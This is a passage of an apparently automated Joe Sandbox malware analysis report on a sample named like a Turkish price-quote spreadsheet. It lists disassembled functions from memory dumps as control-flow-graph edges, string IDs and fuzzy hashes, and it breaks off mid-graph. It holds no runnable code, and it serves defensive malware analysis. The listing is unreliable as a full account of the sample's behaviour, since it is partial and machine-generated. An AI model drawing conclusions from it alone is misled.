                                                  • Instruction Fuzzy Hash: 03F1DA34B10218DFCB08DFA4D999A9DBBB2FF88301F518159E816AB365DB74EC42DB50
                                                  Function 05AE3740 Relevance: 4.1, Strings: 3, Instructions: 360COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1591 5ae3740-5ae3750 1592 5ae3869-5ae388e 1591->1592 1593 5ae3756-5ae375a 1591->1593 1594 5ae3895-5ae38ba 1592->1594 1593->1594 1595 5ae3760-5ae3769 1593->1595 1597 5ae38c1-5ae38f7 1594->1597 1596 5ae376f-5ae3796 1595->1596 1595->1597 1608 5ae385e-5ae3868 1596->1608 1609 5ae379c-5ae379e 1596->1609 1614 5ae38fe-5ae3909 1597->1614 1611 5ae37bf-5ae37c1 1609->1611 1612 5ae37a0-5ae37a3 1609->1612 1613 5ae37c4-5ae37c8 1611->1613 1612->1614 1615 5ae37a9-5ae37b3 1612->1615 1616 5ae37ca-5ae37d9 1613->1616 1617 5ae3829-5ae3835 1613->1617 1622 5ae390b-5ae3916 1614->1622 1623 5ae3987-5ae398f 1614->1623 1615->1614 1619 5ae37b9-5ae37bd 1615->1619 1616->1614 1628 5ae37df-5ae3826 1616->1628 1617->1614 1621 5ae383b-5ae3858 1617->1621 1619->1611 1619->1613 1621->1608 1621->1609 1625 5ae391d-5ae3954 1622->1625 1626 5ae3918-5ae391c 1622->1626 1630 5ae3995-5ae3a7b call 5ae2778 call 5ae1910 1623->1630 1631 5ae3a80-5ae3a90 1623->1631 1641 5ae3978-5ae3985 1625->1641 1642 5ae3956-5ae396a 1625->1642 1626->1625 1628->1617 1630->1631 1639 5ae3b7e-5ae3b9a 1631->1639 1640 5ae3a96-5ae3b70 1631->1640 1656 5ae3ba3-5ae3bae 1639->1656 1689 5ae3b7b 1640->1689 1690 5ae3b72 1640->1690 1641->1623 1692 5ae396d call 5ae3fb8 1642->1692 1693 5ae396d call 5ae3e58 1642->1693 1694 5ae396d call 5ae3cc0 1642->1694 1695 5ae396d call 5ae3cd0 1642->1695 1696 5ae396d call 5ae3fe1 1642->1696 1653 5ae3973 1653->1656 1661 5ae3bdd-5ae3bfe 1656->1661 1662 5ae3bb0-5ae3bc0 1656->1662 1669 5ae3bc2-5ae3bc8 1662->1669 1670 5ae3bd0-5ae3bd6 1662->1670 1669->1670 1670->1661 1689->1639 1690->1689 1692->1653 1693->1653 1694->1653 1695->1653 1696->1653
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (aq$(aq$Haq
                                                  • API String ID: 0-2456560092
                                                  • Opcode ID: d13cb32cd49ccb2f76514382db8059c0474402c049d9b816da326b96d0d5939c
                                                  • Instruction ID: 1019191d2693c11299e020f0a32a78a2d5c7ccdc691af838f04cf7bd85f4889e
                                                  • Opcode Fuzzy Hash: d13cb32cd49ccb2f76514382db8059c0474402c049d9b816da326b96d0d5939c
                                                  • Instruction Fuzzy Hash: 0AE11E34B00209DFCB18EF65D5949ADBBB2FF89300F508569E806AB364DB34ED46DB91
                                                  Function 05E0302D Relevance: 3.9, Strings: 3, Instructions: 109COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1697 5e0302d-5e03031 1698 5e02d24-5e02d31 1697->1698 1699 5e03037-5e03042 1697->1699 1725 5e02d37 call 5e05360 1698->1725 1726 5e02d37 call 5e05351 1698->1726 1701 5e02963-5e0296c 1699->1701 1702 5e02975-5e0318e 1701->1702 1703 5e0296e 1701->1703 1702->1701 1703->1702 1706 5e02810-5e02817 1703->1706 1707 5e02880-5e0288c 1703->1707 1708 5e02891-5e02898 1703->1708 1709 5e028d2-5e028e3 1703->1709 1710 5e02847-5e0286b 1703->1710 1711 5e02908-5e0294b 1703->1711 1712 5e028e8-5e02903 1703->1712 1713 5e0289b-5e028be 1703->1713 1714 5e0287d-5e0287e 1703->1714 1705 5e02d3d-5e02d75 1705->1701 1715 5e02d7b-5e02d86 1705->1715 1706->1707 1719 5e02819-5e02838 1706->1719 1716 5e027f8-5e02801 1707->1716 1709->1716 1710->1716 1717 5e0286d-5e02878 1710->1717 1711->1701 1724 5e0294d-5e02958 1711->1724 1712->1716 1713->1716 1718 5e028c4-5e028cd 1713->1718 1714->1712 1715->1701 1720 5e02803 1716->1720 1721 5e0280a-5e0280b 1716->1721 1717->1716 1718->1716 1719->1716 1723 5e0283a-5e02845 1719->1723 1720->1706 1720->1707 1720->1708 1720->1709 1720->1710 1720->1711 1720->1712 1720->1713 1720->1714 1720->1721 1721->1712 1723->1716 1724->1701 1725->1705 1726->1705
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063553048.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e00000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 6$>$D
                                                  • API String ID: 0-1774137063
                                                  • Opcode ID: 9ee3a9cd749a0671a76a8d31e3d125fc029de9d4d9956439eb3a92776b76fea1
                                                  • Instruction ID: c907bdc8aecaa652617e857844927ea05841060a3c8aa16ce2be64b91473903f
                                                  • Opcode Fuzzy Hash: 9ee3a9cd749a0671a76a8d31e3d125fc029de9d4d9956439eb3a92776b76fea1
                                                  • Instruction Fuzzy Hash: 0351E3B4906269CFEB64CF59D888BEDB6F1BB08314F54A0EAD149B3280D7744AC9CF15
                                                  Function 05ADEDC8 Relevance: 3.0, Strings: 2, Instructions: 516COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1807 5adedc8-5adedee 1808 5adedff-5adee08 1807->1808 1809 5adedf0-5adedfd 1807->1809 1809->1808 1810 5adee0b-5adee18 1809->1810 1811 5adee1a-5adee21 1810->1811 1812 5adee23 1810->1812 1813 5adee2a-5adee54 1811->1813 1812->1813 1814 5adee5d-5adee70 call 5adeaa8 1813->1814 1815 5adee56 1813->1815 1818 5adefb4-5adefbb 1814->1818 1819 5adee76-5adee89 1814->1819 1815->1814 1820 5adf255-5adf25c 1818->1820 1821 5adefc1-5adefd6 1818->1821 1825 5adee8b-5adee92 1819->1825 1826 5adee97-5adeeb1 1819->1826 1822 5adf25e-5adf267 1820->1822 1823 5adf2cb-5adf2d2 1820->1823 1832 5adefd8-5adefda 1821->1832 1833 5adeff6-5adeffc 1821->1833 1822->1823 1830 5adf269-5adf27c 1822->1830 1828 5adf36e-5adf375 1823->1828 1829 5adf2d8-5adf2e1 1823->1829 1831 5adefad 1825->1831 1845 5adeeb8-5adeec5 1826->1845 1846 5adeeb3-5adeeb6 1826->1846 1835 5adf377-5adf388 1828->1835 1836 5adf391-5adf397 1828->1836 1829->1828 1834 5adf2e7-5adf2fa 1829->1834 1830->1823 1850 5adf27e-5adf2c3 call 5adbf70 1830->1850 1831->1818 1832->1833 1838 5adefdc-5adeff3 1832->1838 1839 5adf0c4-5adf0c8 1833->1839 1840 5adf002-5adf004 1833->1840 1856 5adf30d-5adf311 1834->1856 1857 5adf2fc-5adf30b 1834->1857 1835->1836 1858 5adf38a 1835->1858 1842 5adf3a9-5adf3b2 1836->1842 1843 5adf399-5adf39f 1836->1843 1838->1833 1839->1820 1844 5adf0ce-5adf0d0 1839->1844 1840->1839 1849 5adf00a-5adf08b call 5adbf70 * 4 1840->1849 1851 5adf3b5-5adf405 1843->1851 1852 5adf3a1-5adf3a7 1843->1852 1844->1820 1853 5adf0d6-5adf0df 1844->1853 1854 5adeec7-5adeedb 1845->1854 1846->1854 1919 5adf08d-5adf09f call 5adbf70 1849->1919 1920 5adf0a2-5adf0c1 call 5adbf70 1849->1920 1850->1823 1889 5adf2c5-5adf2c8 1850->1889 1909 5adf40d-5adf42a 1851->1909 1852->1842 1852->1851 1860 5adf232-5adf238 1853->1860 1854->1831 1887 5adeee1-5adef35 1854->1887 1862 5adf331-5adf333 1856->1862 1863 5adf313-5adf315 1856->1863 1857->1856 1858->1836 1867 5adf24b 1860->1867 1868 5adf23a-5adf249 1860->1868 1862->1828 1866 5adf335-5adf33b 1862->1866 1863->1862 1871 5adf317-5adf32e 1863->1871 1866->1828 1875 5adf33d-5adf36b 1866->1875 1876 5adf24d-5adf24f 1867->1876 1868->1876 1871->1862 1875->1828 1876->1820 1880 5adf0e4-5adf0f2 call 5add740 1876->1880 1894 5adf10a-5adf124 1880->1894 1895 5adf0f4-5adf0fa 1880->1895 1928 5adef37-5adef39 1887->1928 1929 5adef43-5adef47 1887->1929 1889->1823 1894->1860 1904 5adf12a-5adf12e 1894->1904 1898 5adf0fc 1895->1898 1899 5adf0fe-5adf100 1895->1899 1898->1894 1899->1894 1905 5adf14f 1904->1905 1906 5adf130-5adf139 1904->1906 1912 5adf152-5adf16c 1905->1912 1910 5adf13b-5adf13e 1906->1910 1911 5adf140-5adf143 1906->1911 1926 5adf42c-5adf436 1909->1926 1927 5adf438 1909->1927 1914 5adf14d 1910->1914 1911->1914 1912->1860 1934 5adf172-5adf1f3 call 5adbf70 * 4 1912->1934 1914->1912 1919->1920 1920->1839 1932 5adf43d-5adf43f 1926->1932 1927->1932 1928->1929 1929->1831 1933 5adef49-5adef61 1929->1933 1935 5adf446-5adf44b 1932->1935 1936 5adf441-5adf444 1932->1936 1933->1831 1940 5adef63-5adef6f 1933->1940 1960 5adf20a-5adf230 call 5adbf70 1934->1960 1961 5adf1f5-5adf207 call 5adbf70 1934->1961 1938 5adf451-5adf47e 1935->1938 1936->1938 1943 5adef7e-5adef84 1940->1943 1944 5adef71-5adef74 1940->1944 1945 5adef8c-5adef95 1943->1945 1946 5adef86-5adef89 1943->1946 1944->1943 1948 5adefa4-5adefaa 1945->1948 1949 5adef97-5adef9a 1945->1949 1946->1945 1948->1831 1949->1948 1960->1820 1960->1860 1961->1960
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $]q$$]q
                                                  • API String ID: 0-127220927
                                                  • Opcode ID: 4f0ec10c97507c2a1606053ffe6e2153e994b3b09ca65e7e3ff1aa51b235c90f
                                                  • Instruction ID: 54f59405955d3ad3d1f2bc52bd61fb93edfdadbb32dd8646afdd2df555073f67
                                                  • Opcode Fuzzy Hash: 4f0ec10c97507c2a1606053ffe6e2153e994b3b09ca65e7e3ff1aa51b235c90f
                                                  • Instruction Fuzzy Hash: 1B226D74A012198FCB15DFA5D954EAEFBB2FF48300F148055E822AB394DB399D46CFA1
                                                  Function 057618C0 Relevance: 2.9, Strings: 2, Instructions: 362COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1966 57618c0-57618e8 1968 57618ef-5761918 1966->1968 1969 57618ea 1966->1969 1971 576191a-5761923 1968->1971 1972 5761939 1968->1972 1969->1968 1974 5761925-5761928 1971->1974 1975 576192a-576192d 1971->1975 1973 576193c-5761940 1972->1973 1977 5761cf7-5761d0e 1973->1977 1976 5761937 1974->1976 1975->1976 1976->1973 1979 5761d14-5761d18 1977->1979 1980 5761945-5761949 1977->1980 1981 5761d4d-5761d51 1979->1981 1982 5761d1a-5761d4a 1979->1982 1983 576194e-5761952 1980->1983 1984 576194b-57619a8 1980->1984 1988 5761d72 1981->1988 1989 5761d53-5761d5c 1981->1989 1982->1981 1986 5761954-5761961 1983->1986 1987 576197b-576199f 1983->1987 1991 57619ad-57619b1 1984->1991 1992 57619aa-5761a1b 1984->1992 2011 576196a-5761978 1986->2011 1987->1977 1995 5761d75-5761d7b 1988->1995 1993 5761d63-5761d66 1989->1993 1994 5761d5e-5761d61 1989->1994 1998 57619b3-57619d7 1991->1998 1999 57619da-57619eb 1991->1999 2003 5761a20-5761a24 1992->2003 2004 5761a1d-5761a7a 1992->2004 2001 5761d70 1993->2001 1994->2001 1998->1999 2093 57619ee call 5ae8438 1999->2093 2094 57619ee call 5ae8429 1999->2094 2001->1995 2008 5761a26-5761a4a 2003->2008 2009 5761a4d-5761a71 2003->2009 2012 5761a7f-5761a83 2004->2012 2013 5761a7c-5761ad8 2004->2013 2008->2009 2009->1977 2011->1987 2018 5761a85-5761aa9 2012->2018 2019 5761aac-5761acf 2012->2019 2025 5761add-5761ae1 2013->2025 2026 5761ada-5761b3c 2013->2026 2015 57619f4-5761a01 2023 5761a03-5761a09 2015->2023 2024 5761a11-5761a12 2015->2024 2018->2019 2019->1977 2023->2024 2024->1977 2030 5761ae3-5761b07 2025->2030 2031 5761b0a-5761b22 2025->2031 2035 5761b41-5761b45 2026->2035 2036 5761b3e-5761ba0 2026->2036 2030->2031 2045 5761b24-5761b2a 2031->2045 2046 5761b32-5761b33 2031->2046 2040 5761b47-5761b6b 2035->2040 2041 5761b6e-5761b86 2035->2041 2047 5761ba5-5761ba9 2036->2047 2048 5761ba2-5761c04 2036->2048 2040->2041 2056 5761b96-5761b97 2041->2056 2057 5761b88-5761b8e 2041->2057 2045->2046 2046->1977 2051 5761bd2-5761bea 2047->2051 2052 5761bab-5761bcf 2047->2052 2058 5761c06-5761c68 2048->2058 2059 5761c09-5761c0d 2048->2059 2067 5761bec-5761bf2 2051->2067 2068 5761bfa-5761bfb 2051->2068 2052->2051 2056->1977 2057->2056 2069 5761c6d-5761c71 2058->2069 2070 5761c6a-5761cc3 2058->2070 2062 5761c36-5761c4e 2059->2062 2063 5761c0f-5761c33 2059->2063 2078 5761c50-5761c56 2062->2078 2079 5761c5e-5761c5f 2062->2079 2063->2062 2067->2068 2068->1977 2073 5761c73-5761c97 2069->2073 2074 5761c9a-5761cbd 2069->2074 2080 5761cc5-5761ce9 2070->2080 2081 5761cec-5761cef 2070->2081 2073->2074 2074->1977 2078->2079 2079->1977 2080->2081 2081->1977 2093->2015 2094->2015
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061256251.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5760000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4']q$4']q
                                                  • API String ID: 0-3120983240
                                                  • Opcode ID: c36a4fe7a4637f80835e5ca008f37cca9b755748b3f8d750adf9d5aa5253e9e6
                                                  • Instruction ID: 85c2535150fbb8c961169224db280468836285d9c12fc6fa44e8b136b0e2b9f9
                                                  • Opcode Fuzzy Hash: c36a4fe7a4637f80835e5ca008f37cca9b755748b3f8d750adf9d5aa5253e9e6
                                                  • Instruction Fuzzy Hash: 40F1D534E15208DFCB18DFA4E5986ACBBB2FF4A311F608129E806A7354DB355D86DF50
                                                  Function 057ED770 Relevance: 2.8, Strings: 2, Instructions: 346COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 2095 57ed770-57ed782 2097 57ed7ac-57ed7b0 2095->2097 2098 57ed784-57ed7a5 2095->2098 2099 57ed7bc-57ed7cb 2097->2099 2100 57ed7b2-57ed7b4 2097->2100 2098->2097 2102 57ed7cd 2099->2102 2103 57ed7d7-57ed803 2099->2103 2100->2099 2102->2103 2106 57ed809-57ed80f 2103->2106 2107 57eda30-57eda42 2103->2107 2108 57ed815-57ed81b 2106->2108 2109 57ed8e1-57ed8e5 2106->2109 2120 57eda49-57eda4c 2107->2120 2121 57eda44-57eda46 2107->2121 2108->2107 2111 57ed821-57ed82e 2108->2111 2112 57ed908-57ed911 2109->2112 2113 57ed8e7-57ed8f0 2109->2113 2115 57ed834-57ed83d 2111->2115 2116 57ed8c0-57ed8c9 2111->2116 2118 57ed936-57ed939 2112->2118 2119 57ed913-57ed933 2112->2119 2113->2107 2117 57ed8f6-57ed906 2113->2117 2115->2107 2123 57ed843-57ed85b 2115->2123 2116->2107 2122 57ed8cf-57ed8db 2116->2122 2124 57ed93c-57ed942 2117->2124 2118->2124 2119->2118 2125 57eda4d-57eda77 2120->2125 2121->2125 2126 57eda48 2121->2126 2122->2108 2122->2109 2127 57ed85d 2123->2127 2128 57ed867-57ed879 2123->2128 2124->2107 2130 57ed948-57ed95b 2124->2130 2145 57eda8d-57eda99 2125->2145 2146 57eda79 2125->2146 2126->2120 2127->2128 2128->2116 2138 57ed87b-57ed881 2128->2138 2130->2107 2131 57ed961-57ed971 2130->2131 2131->2107 2133 57ed977-57ed984 2131->2133 2133->2107 2136 57ed98a-57ed99f 2133->2136 2136->2107 2144 57ed9a5-57ed9c8 2136->2144 2139 57ed88d-57ed893 2138->2139 2140 57ed883 2138->2140 2139->2107 2143 57ed899-57ed8bd 2139->2143 2140->2139 2144->2107 2154 57ed9ca-57ed9d5 2144->2154 2149 57eda9b 2145->2149 2150 57edaa5-57edac1 2145->2150 2148 57eda7c-57eda7e 2146->2148 2152 57edac2-57edad2 2148->2152 2153 57eda80-57eda8b 2148->2153 2149->2150 2159 57edad9-57edadc 2152->2159 2160 57edad4-57edad6 2152->2160 2153->2145 2153->2148 2157 57eda26-57eda2d 2154->2157 2158 57ed9d7-57ed9e1 2154->2158 2158->2157 2165 57ed9e3-57ed9f9 2158->2165 2162 57edadd-57edaef 2159->2162 2160->2162 2163 57edad8 2160->2163 2167 57edb07-57edb09 2162->2167 2168 57edaf1-57edaf7 2162->2168 2163->2159 2172 57ed9fb 2165->2172 2173 57eda05-57eda1e 2165->2173 2189 57edb0b call 57eed2f 2167->2189 2190 57edb0b call 57edb88 2167->2190 2191 57edb0b call 57edb79 2167->2191 2170 57edafb-57edafd 2168->2170 2171 57edaf9 2168->2171 2170->2167 2171->2167 2172->2173 2173->2157 2174 57edb11-57edb15 2175 57edb17-57edb2e 2174->2175 2176 57edb60-57edb70 2174->2176 2175->2176 2182 57edb30-57edb3a 2175->2182 2184 57edb3c-57edb4b 2182->2184 2185 57edb4d-57edb5d 2182->2185 2184->2185 2189->2174 2190->2174 2191->2174
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (aq$d
                                                  • API String ID: 0-3557608343
                                                  • Opcode ID: e8120b02dcdc8fce8068528ff43509471f01d0cb1b076e5758a913f7e6058753
                                                  • Instruction ID: 963c6899898b30af7e7201d83d2043e83fee03ba675f47643bdafe356b143b7c
                                                  • Opcode Fuzzy Hash: e8120b02dcdc8fce8068528ff43509471f01d0cb1b076e5758a913f7e6058753
                                                  • Instruction Fuzzy Hash: E5D166306007068FCB24DF29C48496ABBF2FF88314B5A896DD45A8B365DB30FD42DB94
                                                  Function 05761598 Relevance: 2.7, Strings: 2, Instructions: 231COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 2192 5761598-57615bd 2194 57615c4-57615e1 2192->2194 2195 57615bf 2192->2195 2196 5761602 2194->2196 2197 57615e3-57615ec 2194->2197 2195->2194 2198 5761605-5761609 2196->2198 2199 57615f3-57615f6 2197->2199 2200 57615ee-57615f1 2197->2200 2202 5761824-576183b 2198->2202 2201 5761600 2199->2201 2200->2201 2201->2198 2204 5761841-5761845 2202->2204 2205 576160e-5761612 2202->2205 2206 5761847-576186c 2204->2206 2207 576186f-5761873 2204->2207 2208 5761614-57616b2 2205->2208 2209 576161a-576161e 2205->2209 2206->2207 2210 5761894 2207->2210 2211 5761875-576187e 2207->2211 2215 57616b4-5761752 2208->2215 2216 57616ba-57616be 2208->2216 2213 5761620-5761645 2209->2213 2214 5761648-576166d 2209->2214 2220 5761897-576189d 2210->2220 2218 5761885-5761888 2211->2218 2219 5761880-5761883 2211->2219 2213->2214 2240 576168e 2214->2240 2241 576166f-5761678 2214->2241 2228 5761754-57617ef 2215->2228 2229 576175a-576175e 2215->2229 2222 57616c0-57616e5 2216->2222 2223 57616e8-576170d 2216->2223 2225 5761892 2218->2225 2219->2225 2222->2223 2250 576172e 2223->2250 2251 576170f-5761718 2223->2251 2225->2220 2237 57617f1-5761816 2228->2237 2238 5761819-576181c 2228->2238 2234 5761760-5761785 2229->2234 2235 5761788-57617ad 2229->2235 2234->2235 2266 57617ce 2235->2266 2267 57617af-57617b8 2235->2267 2237->2238 2238->2202 2249 5761691-5761698 2240->2249 2247 576167f-5761682 2241->2247 2248 576167a-576167d 2241->2248 2253 576168c 2247->2253 2248->2253 2254 576169a-57616a0 2249->2254 2255 57616a8-57616a9 2249->2255 2259 5761731-5761738 2250->2259 2257 576171f-5761722 2251->2257 2258 576171a-576171d 2251->2258 2253->2249 2254->2255 2255->2202 2262 576172c 2257->2262 2258->2262 2263 576173a-5761740 2259->2263 2264 5761748-5761749 2259->2264 2262->2259 2263->2264 2264->2202 2268 57617d1-57617d8 2266->2268 2270 57617bf-57617c2 2267->2270 2271 57617ba-57617bd 2267->2271 2272 57617da-57617e0 2268->2272 2273 57617e8-57617e9 2268->2273 2275 57617cc 2270->2275 2271->2275 2272->2273 2273->2202 2275->2268
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061256251.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5760000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4']q$4']q
                                                  • API String ID: 0-3120983240
                                                  • Opcode ID: d74eb119bd0027120688672b7befba5f36eb52acc3a67712140fbe5ad4cca403
                                                  • Instruction ID: 808446bff405ecd9cfdfe80449a20863ea72c41e9784030c7b7c7db176f3623b
                                                  • Opcode Fuzzy Hash: d74eb119bd0027120688672b7befba5f36eb52acc3a67712140fbe5ad4cca403
                                                  • Instruction Fuzzy Hash: DCA1D374E01209CFCB18EFA5D588ABDBBB6FF89311F908029E81267264CB345D46EF51
                                                  Function 05ADE3E8 Relevance: 2.7, Strings: 2, Instructions: 181COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 2315 5ade3e8-5ade40a 2316 5ade4fe-5ade523 2315->2316 2317 5ade410-5ade412 2315->2317 2319 5ade52a-5ade54e 2316->2319 2318 5ade418-5ade424 2317->2318 2317->2319 2324 5ade438-5ade448 2318->2324 2325 5ade426-5ade432 2318->2325 2331 5ade555-5ade579 2319->2331 2324->2331 2332 5ade44e-5ade45c 2324->2332 2325->2324 2325->2331 2335 5ade580-5ade605 call 5adb498 2331->2335 2332->2335 2336 5ade462-5ade467 2332->2336 2362 5ade60a-5ade618 call 5add740 2335->2362 2371 5ade469 call 5ade5f8 2336->2371 2372 5ade469 call 5ade3e8 2336->2372 2338 5ade46f-5ade4b8 2353 5ade4db-5ade4fb call 5adc540 2338->2353 2354 5ade4ba-5ade4d3 2338->2354 2354->2353 2367 5ade61a-5ade620 2362->2367 2368 5ade630-5ade632 2362->2368 2369 5ade624-5ade626 2367->2369 2370 5ade622 2367->2370 2369->2368 2370->2368 2371->2338 2372->2338
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (aq$Haq
                                                  • API String ID: 0-3785302501
                                                  • Opcode ID: e1ea706c0e743c796ef8f45c642956db92aa9c2901998673eb69e56956772109
                                                  • Instruction ID: 0ba71d195b23dd321e73fea2638674e7196a99ef726dd4678851c775684ca728
                                                  • Opcode Fuzzy Hash: e1ea706c0e743c796ef8f45c642956db92aa9c2901998673eb69e56956772109
                                                  • Instruction Fuzzy Hash: 4151AC307002158FC759AF79C454A2EBBB6FF9A600B5484ADD9068B3A5DF35EC03CBA1
                                                  Function 03111FB4 Relevance: 2.7, Strings: 2, Instructions: 173COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 2373 3111fb4-3111fdd 2377 3111fe3-3111fea 2373->2377 2378 3111e87-3111e93 2373->2378 2379 3112041-311205a 2377->2379 2380 3111bca-3111bd0 2377->2380 2385 3111da6-3111db4 2378->2385 2386 3111e99-3111ea0 2378->2386 2379->2380 2384 3112060-3112065 2379->2384 2382 3111bd2 2380->2382 2383 3111bd9 2380->2383 2382->2385 2387 3111e51-3111e56 2382->2387 2388 3111ed4-3111f01 2382->2388 2389 3111e16-3111e24 2382->2389 2390 3111db9-3111dd8 2382->2390 2391 3111d78-3111d86 2382->2391 2392 3111e5b 2382->2392 2393 3111cda-3111cfc 2382->2393 2394 3111c5c-3111c60 2382->2394 2395 3111ebe-3111ec2 2382->2395 2396 3111e3e-3111e4c 2382->2396 2397 3111d61 2382->2397 2398 3111d01-3111d1b 2382->2398 2399 3111ea5-3111eb9 2382->2399 2400 3111f84-3111faf 2382->2400 2401 3111d66-3111d73 2382->2401 2402 3111c49-3111c57 2382->2402 2403 3111c88 2382->2403 2404 3111c0b-3111c16 2382->2404 2405 3111d2b-3111d57 2382->2405 2383->2393 2383->2404 2384->2380 2385->2380 2386->2380 2386->2399 2387->2379 2388->2380 2389->2380 2390->2380 2416 3111dde-3111de5 2390->2416 2391->2380 2415 3111e65-3111e6d 2392->2415 2393->2380 2407 3111c62-3111c73 2394->2407 2408 3111c8d-3111cd5 2394->2408 2395->2400 2406 3111ec8-3111ecf 2395->2406 2396->2380 2409 3111e29-3111e39 2397->2409 2398->2380 2410 3111d21-3111d26 2398->2410 2399->2380 2400->2380 2401->2380 2402->2380 2403->2409 2404->2380 2405->2380 2406->2380 2407->2380 2411 3111c79-3111c7e 2407->2411 2408->2393 2413 3111bc4-3111bc7 2408->2413 2409->2380 2410->2380 2411->2380 2413->2380 2417 3111e75-3111e82 2415->2417 2416->2380 2417->2380
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $\s]q
                                                  • API String ID: 0-2102667761
                                                  • Opcode ID: f771f5178a97a2772fcb563005e9d48329882dbb2a5dbfad406ce53ddebd306b
                                                  • Instruction ID: 9f5ee2bf16c42708dffb1751729ca140a70d1f1f2d0cd62a67b0de262bde7c13
                                                  • Opcode Fuzzy Hash: f771f5178a97a2772fcb563005e9d48329882dbb2a5dbfad406ce53ddebd306b
                                                  • Instruction Fuzzy Hash: FE71E4B490021ADFEF14CFA5D8847EEBBF1BB48304F159239C502AA290EB795595CB29
                                                  Function 03111F06 Relevance: 2.7, Strings: 2, Instructions: 163COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 2419 3111f06-3111f14 2421 3111d2b-3111d57 2419->2421 2422 3111f1a-3111f2a 2419->2422 2423 3111bca-3111bd0 2421->2423 2422->2423 2424 3111f30-3111f37 2422->2424 2425 3111bd2 2423->2425 2426 3111bd9 2423->2426 2424->2423 2427 3111f84-3111faf 2424->2427 2425->2421 2425->2427 2428 3111e51-311205a 2425->2428 2429 3111ed4-3111f01 2425->2429 2430 3111e16-3111e24 2425->2430 2431 3111db9-3111dd8 2425->2431 2432 3111d78-3111d86 2425->2432 2433 3111e5b 2425->2433 2434 3111cda-3111cfc 2425->2434 2435 3111c5c-3111c60 2425->2435 2436 3111ebe-3111ec2 2425->2436 2437 3111e3e-3111e4c 2425->2437 2438 3111d61 2425->2438 2439 3111d01-3111d1b 2425->2439 2440 3111ea5-3111eb9 2425->2440 2441 3111d66-3111d73 2425->2441 2442 3111da6-3111db4 2425->2442 2443 3111c49-3111c57 2425->2443 2444 3111c88 2425->2444 2445 3111c0b-3111c16 2425->2445 2426->2434 2426->2445 2427->2423 2428->2423 2454 3112060-3112065 2428->2454 2429->2423 2430->2423 2431->2423 2458 3111dde-3111de5 2431->2458 2432->2423 2457 3111e65-3111e6d 2433->2457 2434->2423 2447 3111c62-3111c73 2435->2447 2448 3111c8d-3111cd5 2435->2448 2436->2427 2446 3111ec8-3111ecf 2436->2446 2437->2423 2449 3111e29-3111e39 2438->2449 